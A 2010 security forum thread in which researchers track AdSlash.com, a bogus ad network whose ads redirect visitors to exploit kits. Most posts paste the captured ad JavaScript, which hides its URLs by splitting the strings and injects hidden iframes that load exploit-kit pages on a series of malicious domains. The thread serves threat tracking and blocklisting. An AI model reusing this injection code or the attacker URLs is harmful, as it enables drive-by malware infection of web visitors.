Author Topic: AdSlash.com is a bogus ad network  (Read 9985 times)

0 Members and 1 Guest are viewing this topic.

January 20, 2010, 04:42:44 pm
Read 9985 times

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
AdSlash.com is a bogus ad network
 
Quote
We've seen a number of ads being punted through AdSlash.com to legitimate ad networks, but it appears that these are leading to a PDF Exploit (don't visit these sites, obviously!).

For example:
fwlink.nx7.zedo.com.adslash.com/?alx=a27131939386&td=qcbp71pz=42834&sz=728x90&_zm=359161&st=n1n4&id=131939386&zcw=gh17chl277&xryr=3913771&mp=1460h1
fwlink.nx7.zedo.com.adslash.com/stats_js_e.php?id=131939386
fwlink.nx7.zedo.com.adslash.com/bdb/Health/banner_728.gif
fridayalways.com/kven/index.php
fridayalways.com/kven/js/common.js
fridayalways.com/kven/pdfadmnplay.php
fridayalways.com/kven/files/backoutblack.pdf

or
...

Read more
http://www.dynamoo.com/blog/2010/01/adslashcom-is-bogus-ad-network.html
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

January 20, 2010, 04:58:53 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
In the last days I have seen an exploit kit at the same host as fridayalways.com.
Domain name changes daily, sometimes more than once daily. Today I saw uparms.com and sportsbettingaustralia.com.

http://www.malwaredomainlist.com/mdl.php?search=213.108.56.18&colsearch=All&quantity=50&inactive=on

It was always a link at adslash that lead to the exploit kit.

This is the bad url
Code: [Select]
fwlink.nx7.zedo.com.adslash.com/?alx=a27131959519&td=qcbp71pz=42834&sz=120x600&_zm=359161&st=n1n4&id=131959519&zcw=gh17chl277&xryr=3913771&mp=1460h1
Now it directs to the exploit kit at
Code: [Select]
aboutleaving.com/abglde/index.php
Ruining the bad guy's day

January 20, 2010, 05:27:32 pm
Reply #2

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Nice find :) (not had time to look into this myself yet)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

January 20, 2010, 06:10:09 pm
Reply #3

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
The url doesn't redirect any longer to exploit kit. But I saved a copy of the page from today when it was directing to sportsbettingaustralia. com.

Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
  document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://spo"; var eu3 = "rtsbettingaustr"; var eu4 = "alia.com/spglde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




       //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day

January 20, 2010, 06:31:02 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Story continues. Now directing to a Neosploit kit at
Code: [Select]
http://essentiuz.com/ld/trest11/
http://wepawet.cs.ucsb.edu/view.php?hash=d7dd742b0efe8b0b955facf092f6f1d8&t=1264013587&type=js
http://www.virustotal.com/analisis/b0236f5af7958fe116e9dc29ae11deadc37f858f02a3d7915fdff0cbcb1cc8b7-1264012440


Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
  document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://ess"; var eu3 = "entiuz.com/ld/t"; var eu4 = "rest11/";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




       //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day

January 20, 2010, 09:51:15 pm
Reply #5

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
No we know the name of the exploit kit:

Seo Sploit Pack

http://www.malwaredomainlist.com/forums/index.php?topic=2207.msg13872#msg13872
Ruining the bad guy's day

January 21, 2010, 07:16:48 pm
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Now adslash directs to Seo Sploit Pack at

Code: [Select]
http://aboutstarting.com/abde/index.php
Code: [Select]
    <html><body style="margin:0; padding:0;">
    <script type="text/javascript">
       
        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);
   
   
   
    var cd1 = "fwl";
    var cd2 = "ink.nx7.";
    var cd3 = "zedo.com.adslash.com";
    var cur_domain = cd1 + cd2 + cd3;
   
        var all_t = "";
        var mtch = all_t.match(statictml);   
       
   
    if ( mtch != null ) {
       document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
    }  else  {
                 
                                         
                 
                  var eu1 = "htt"; var eu2 = "p://abo"; var eu3 = "utstarting.com/"; var eu4 = "abde/index.php";                 
                  var eu = eu1 + eu2 + eu3 + eu4;
                 
                  //               
                                    var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
                  var js_e = js_e1 + js_e2 + js_e3 + js_e4;
                  document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E")); 
                  //                                 
                 
                  document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));                                   
                   

      } //!mtch     
   
   

       
            //
     
    document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));
       
 

    </script>
   
         
    </body></html>
   
Ruining the bad guy's day

January 22, 2010, 07:21:15 am
Reply #7

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
aboutadding.com/abtde/index.php
Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://abo"; var eu3 = "utadding.com/ab"; var eu4 = "tde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day

January 22, 2010, 12:37:43 pm
Reply #8

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
http://noticeabout.com/ntde/index.php
Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://not"; var eu3 = "iceabout.com/nt"; var eu4 = "de/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day

January 22, 2010, 06:43:44 pm
Reply #9

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
http://feelingabout.com/flde/index.php
Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://fee"; var eu3 = "lingabout.com/f"; var eu4 = "lde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day

January 23, 2010, 04:41:18 am
Reply #10

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
http://decisabout.com/decide/index.php
Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://dec"; var eu3 = "isabout.com/dec"; var eu4 = "ide/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day

January 23, 2010, 12:32:00 pm
Reply #11

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
http://aboutexactly.com/boude/index.php
Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://abo"; var eu3 = "utexactly.com/b"; var eu4 = "oude/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day

January 23, 2010, 05:44:01 pm
Reply #12

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
http://trade-statistics.com/trde/index.php
Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://tra"; var eu3 = "de-statistics.c"; var eu4 = "om/trde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day

January 24, 2010, 12:48:51 am
Reply #13

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
google.com.analytics.kdgsrltkcun.com/nte/trest11
Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://goo"; var eu3 = "gle.com.analyti"; var eu4 = "cs.kdgsrltkcun.com/nte/trest11";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day

January 24, 2010, 03:05:40 pm
Reply #14

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
http://macromedia-update.com/matde/index.php
Code: [Select]
<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://mac"; var eu3 = "romedia-update."; var eu4 = "com/matde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>
Ruining the bad guy's day